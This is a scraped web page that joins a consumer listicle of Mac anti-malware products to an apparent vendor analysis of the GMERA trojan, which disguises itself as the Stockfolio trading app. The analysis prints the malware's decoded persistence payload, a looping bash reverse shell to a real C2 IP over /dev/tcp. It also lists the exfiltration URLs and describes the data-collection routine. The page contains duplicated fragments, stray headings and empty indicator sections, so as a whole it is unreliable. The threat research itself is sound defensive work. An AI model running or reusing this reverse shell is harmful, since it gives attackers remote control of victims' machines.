1. Mac Anti Malware Apple
2. Malware Software For Mac

There is a popular opinion that Mac systems are inherently more secure than Windows. In fact, most Mac users don’t even bother to use an antivirus or anti-malware software. Objectively speaking, that opinion may or may not be true. Mainly because that depends on a variety of factors like the number of Mac users, how they use their system, how computer literate they are, etc. However, over the past few years, the threats to Mac users have been increasing, thanks to quickly spearing malware, ransomware, and adware.

1. Mac Apps for Anti-Spyware. Protect your privacy and keep your sensitive data safe from spyware, Trojans, keyloggers, and other monitoring malware.
2. Secure your Mac with these powerful Antivirus One protection features: 1. Real Time Detection Live malware detector on the go. Protect your Mac against all threats 24/7. Virus Scanner Quick scan, deep scan or customize scan locations to safeguard every part of your disk. Virus Cleaner (In-App.

Read: Best Malware Removal Tools For Windows

Secure your Mac with these powerful Antivirus One protection features: 1. Real Time Detection Live malware detector on the go. Protect your Mac against all threats 24/7. Virus Scanner Quick scan, deep scan or customize scan locations to safeguard every part of your disk. Virus Cleaner (In-App Purchase required).

Avoid MacKeeper

I bet you might have seen ads on websites (mostly porn sites), telling you to clean your Mac with MacKeeper. And while it’s legitimate software (as in not a virus), but it’s nonetheless useless and a waste of resources. Also, uninstalling MacKeeper isn’t easy as well. So, no matter what you do, avoid MacKeeper at any cost.

Instead, it is essential that you use a good anti-malware software so that not only you can be safe but also avoid spreading malware, ransomware, and viruses to other users. Here are some of the best anti-malware software for mac.

Read: How I Removed Malware From my WordPress Site

Best Anti Malware for Mac

1. Malwarebytes

When it comes to dealing with malware and other nasty stuff like rootkits, there is no other software that more popular than Malwarebytes. Other than it being able to remove malware from Mac effectively, the best thing about Malwarebytes is that it plays nice with your other antivirus software if you’ve already installed any. In fact, most users including me use Malwarebytes as a backup and perform weekly scans just to make sure that the system hasn’t been infected or has infected files.

To scan your system all you have to do is install the application, launch it and hit the scan button. As soon as you hit the button, it can do a quick scan for malware, PUPs (potentially unwanted programs), rootkits, adware, spyware, virus, etc., both in your system memory and hard disk. If it finds any threats, it will automatically quarantine those threats.

For in-depth scanning, select the custom scan option. Do keep in mind that the custom scan can take a couple of hours depending on the amount of data you have on your hard disk.

Download Malwarebytes (free, $40 for pro version)

2. Systweak Anti-Malware

Systweak Anti-Malware is a dedicated malware scanning and removal software for MacOS. Just like Malwarebytes, Systweak Anti-Malware scans for malware, rootkits, viruses, and adware in your hard disk and system memory. Once it finds a threat, it automatically quarantines it. If you know that Systweak Anti-Malware quarantined a false positive, you can restore the file or app with just a single click. For regular, deep, or custom scans, you can create custom schedules.

If you know a file or folder to be safe, you can exclude them from scanning avoiding any possible false positives by adding them to the exclude list. Of course, Systweak Anti-Malware always runs in the background and protects your Mac system from malware and PUPs in real-time. Other features of the software include start-up scan, memory scan, and beginner friendly user interface.

So, if you unsatisfied or looking for a good alternative for Malwarebytes you should try Systweak Anti-Malware.

Download Systweak Anti-Malware ($40)

3. Bitdefender

Bitdefender is another popular software to protect your mac from various threats like malware, virus, trojans, adware, spyware, unwanted software, and much more. The best thing about Bitdefender is that apart from protecting you from regular threats, it can actively scan in multiple layers and protect your system from ransomware. Other than that, Bitdefender can also keep an eye on cross-platform threats so that you don’t unintentionally spread malware, virus, or other infected files to your friends, colleagues or family.

Since Bitdefender always runs in the background, it can block any and all threats in real-time. Of course, Bitdefender also scans your system occasionally. If needed, you can create custom schedules with various configurations and scan settings. Bitdefender also has other features like backup protection, safe files, parental controls, secure shopping protection, etc.

Simply put, if you need a full-fledged software that can do much more than blocking and removing malware then give Bitdefender a try.

Download Bitdefender ($50 – $70 according to the version you choose)

4. Avast

Just like Bitdefender, Avast is not just an anti-malware software, it is a anti-virus software that can scan and protect your system from a wide range of threats. In fact, if you’ve ever searched for a anti-virus software, you should have definitely heard about Avast.

Using Avast you can regularly scan your system and create your own schedules to better protect your system. Along with anti-malware security, Avast can also protect your system from infected emails, unprotect WiFi network, and ransomware. Other features of the software include real-time protection, detailed security reports, browser protection, ability to shield you from dangerous downloads and PUPs, etc.

As good as the software is, while using Avast, you should be ready for a little bit of performance dip, at least, that is my experience while using Avast. Other than that, Avast is a pretty good and reputed software to protect Mac system from online and offline threats.

Download Avast (free, $70 for pro version)

5. AVG

AVG is yet another popular software that can protect you from malware, viruses, trojans, adware, and other threats. The good thing about AVG is that you can scan your system for threats related to Mac, Windows, and Android so that you don’t spread viruses or malware to other systems. Also, thanks to the simple and minimal design, using AVG to scan or create scanning schedules is pretty easy and straightforward. Moreover, unlike Avast, AVG always runs in the background and provides real-time protection for free.

As good as it is, when you try to download AVG from the official site, you will be redirected to the CNET website. So, be careful while installing it on your system as CNET has a habit of bundling adware and other toolbars along with the software you are trying to install.

If you are looking for all-around protection with real-time threat analysis and blocking then you should go with AVG.

Download AVG (free)

6. Sophos Home

Another popular opinion amongst Mac users which is more than just an Anti-Malware. Sophos Home comes with a bunch of extra features including a live chat support.

Sophos offers features like Anti-virus and ransomware security along with anti-malware protection. The programme also lets you remotely manage your devices. Yes ‘Device(s)’, Sophos home can be used in up to 10 devices for the paid version and 3 devices for the free version. Doesn’t end here, Sophos Home also lets you put on parental controls so that none of your devices reach the unprotected side of Web.

Download Sophos Home (30 day trial, $27 yearly for premium)

Wrapping Up: Best Anti Malware for Mac

If you are looking for a dedicated anti-malware software that plays well with other antivirus and firewall software then go with Malwarebytes. As a premium option, you can also try Systweak Anti-Malware. If you are looking for a full-fledged anti-virus software that can extend the protection to viruses, adware, ransomware, and other threats then go with AVG as it provides real-time protection for free. You can also try Bitdefender.

In general, if you know what you are doing on the Internet and don’t download the cracked software or porn, you’ll probably don’t need an anti-virus and/or anti-malware software. That said, if you don’t consider yourself tech savvy or if you are buying a computer for your parents, it’s a good idea to have an anti-malware installed.

That’s for now. If you think I missed any of your favorite anti-malware software then command below and share it with me. It will also help other Mac users.

Read: Top 10 Free Portable Anti-Malware Software to Have on Your Pen Drive

Cyber Threats

We recently found and analyzed a malicious malware variant that disguised itself as a legitimate Mac-based trading app called Stockfolio. We found two variants of the malware family.

Unlike in the pre-internet era, when trading in the stock or commodities market involved a phone call to a broker — a move which often meant additional fees for would-be traders — the rise of trading apps placed the ability to trade in the hands of ordinary users. However, their popularity has led to their abuse by cybercriminals who create fake trading apps as lures for unsuspecting victims to steal their personal data. We recently found and analyzed an example of such an app, which had a malicious malware variant that disguised itself as a legitimate Mac-based trading app called Stockfolio.

We found two variants of the malware family. The first one contains a pair of shell scripts and connects to a remote site to decrypt its encrypted codes while the second sample, despite using a simpler routine involving a single shell script, actually incorporates a persistence mechanism.

Sample 1: Trojan.MacOS.GMERA.A

We found the first sample (detected as Trojan.MacOS.GMERA.A) while checking suspicious shell scripts that were flagged by our machine learning system. At first glance, it was challenging to directly identify its malicious behavior because the shell script references other files such as AppCode, .pass and .app. To verify that the behavior was indeed malicious, we sourced the parent file using both our infrastructure and the aggregate website VirusTotal (which had the sample but lacked detections from other major security vendors at the time of writing).

Figure 1. The suspicious shell script which was flagged by our system

The initial sample we analyzed was a zip archive file (detected as Trojan.MacOS.GMERA.A) that contained an app bundle (Stockfoli.app) and a hidden encrypted file (.app). The fake app presents itself as legitimate to trick users, but we found that it contained several malicious components.

Figure 2. Content of the zip file. Note that the app bundle is missing the “o” at the end, whereas the legitimate app is called Stockfolio.

The zip file and its contents

The first suspicious component we found was an app bundle under the Resources directory, which seems to be a copy of the legitimate Stockfolio version 1.4.13 but with the malware author’s digital certificate.

Comparing it to the Resources directory of the current version (1.5) found on the Stockfolio website revealed a number of differences, as shown in the figure below.

Figure 3. Comparison of the app bundle folder structure between the malware variant (top) and the legitimate app (version 1.5, bottom).

Mac Anti Malware Apple

Technical Analysis

When the app is executed, an actual trading app interface will appear on-screen. However, unbeknownst to the user, the malware variant is already performing its malicious routines in the background.

Figure 4. interface displayed when the malware app bundle is executed

The main Mach-O executable will launch the following bundled shell scripts in the Resources directory:

• plugin
• stock

The plugin and stock shell scripts

The plugin shell script collects the following information from the infected system:

• username
• IP address
• apps in /Applications
• files in ~/Documents
• files in ~/Desktop
• OS installation date
• file system disk space usage
• graphic/display information
• wireless network information
• screenshots

It then encodes the collected information using base64 encoding and saves the collected information in a hidden file: /tmp/.info. It then uploads the file to hxxps://appstockfolio.com/panel/upload[.]php using the collected username and machine serial number as identifiers.

If a successful response is sent from the URL, it will write the response in another hidden file ~/Library/Containers/.pass

Figure 5 . The “plugin” script

The stock shell script will copy Stockfoli.app/Contents/Resources/appcode to /private/var/tmp/appcode. It then locates the .app file, which is the hidden file in the zip bundle that comes with Stockfoli.app

Figure 6. The “stock” script

It decodes the b64-encoded .app file, executes it, then drops the following:

It will delete the .app file then check if the file ~/Library/Containers/.pass exists. Using the contents of the ‘.pass’ file as the key, the malware variant will decrypt /private/var/tmp/appcode, which is encrypted using AES-256-CBC. It then saves the decrypted file to /tmp/appcode. Finally, it will execute the appcode. If it fails to do so, it will delete the /tmp/appcode file and ~/Library/Containers/.pass. Note that in the sample we analyzed, the decryption routine failed since the sample was not able to create ~/Library/Containers/.pass.

Figure 7. Comparison of the code-signing information of the malicious app (top) and the legitimate Stockfolio app (bottom)

Malware Software For Mac

We suspect the file appcode is a malware file that contains additional routines. However, at the time of writing, we were unable to decrypt this file since the upload URL hxxps://appstockfolio.com/panel/upload[.]php was inaccessible (according to VirusTotal, the domain was active from January to February 2019). Furthermore, we suspect that the full malware routine uses the TOR network due to the presence of the unused address gmzera54l5qpa6lm[.]onion.

Sample 2: Trojan.MacOS.GMERA.B

Using the digital certificate of the first sample, we were able to find a second variant (detected as Trojan.MacOS.GMERA.B) that was uploaded to VirusTotal on June 2019. Like the first variant, it contains an embedded copy of Stockfolio.app version 1.4.13 with the malware author’s digital certificate. It launches the app in a similar manner when executed to disguise its malicious intent.

Figure 8. The bundle structure of Trojan.MacOS.GMERA.B

Once opened, Trojan.MacOS.GMERA.B will execute the embedded copy of Stockfolio version 1.4.13, after which it will launch the shell script run.sh

The script run.sh collects usernames and ip addresses from the infected machine via the following command:

• username = ‘whoami’
• ip address = 'curl -s ipecho.net/plain'

It connects to the malware URL hxxp://owpqkszz[.]info to send the username and IP address information using the following format:

• hxxp://owpqkszz[.]info/link.php?{username}&{ip address}

As part of its routine, the malware also drops the following files:

It then creates a simple reverse shell to the C&C server 193[.]37[.]212[.]176. Once connected, the malware author can run shell commands.

Figure 9. Content of the run.sh shell script

One of the primary changes found in the second variant, aside from the simplified routine, is the presence of a persistence mechanism via the creation of a property list (plist) file: ~/Library/LaunchAgents/.com.apple.upd.plist

Figure 10. Hidden plist file used for persistence

After we decoded the b64-encoded arguments for the plist file, we found the following code:

• while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done

This code instructs the plist file to constantly create the reverse shell mentioned earlier, occuring every 10,000 seconds. The simple reverse shell created was observed to use the ports 25733-25736.

Conclusion

Given the changes we’ve seen from the malware variant’s initial iteration to its current one, we notice a trend in which the malware authors have simplified its routine and added further capabilities. It’s possible that the people behind it are looking for ways to make it more efficient – perhaps even adding evasion mechanisms in the future.

In the meantime, we advise aspiring traders to practice caution when it comes to the programs they download, especially if it comes from an unknown or suspicious website. We recommend that users only download apps from official sources to minimize chances of downloading a malicious one. We reached out to Apple before publication of this entry, and they informed us that the code signing certificate of this fake app's developers was revoked in July of this year.

Trend Micro solutions

End users can benefit from security solutions such as Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats. Enterprises can benefit from Trend Micro’s Smart Protection Suites with XGen™ security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint.

Indicators of Compromise (IoCs)

Sample 1

Sample 2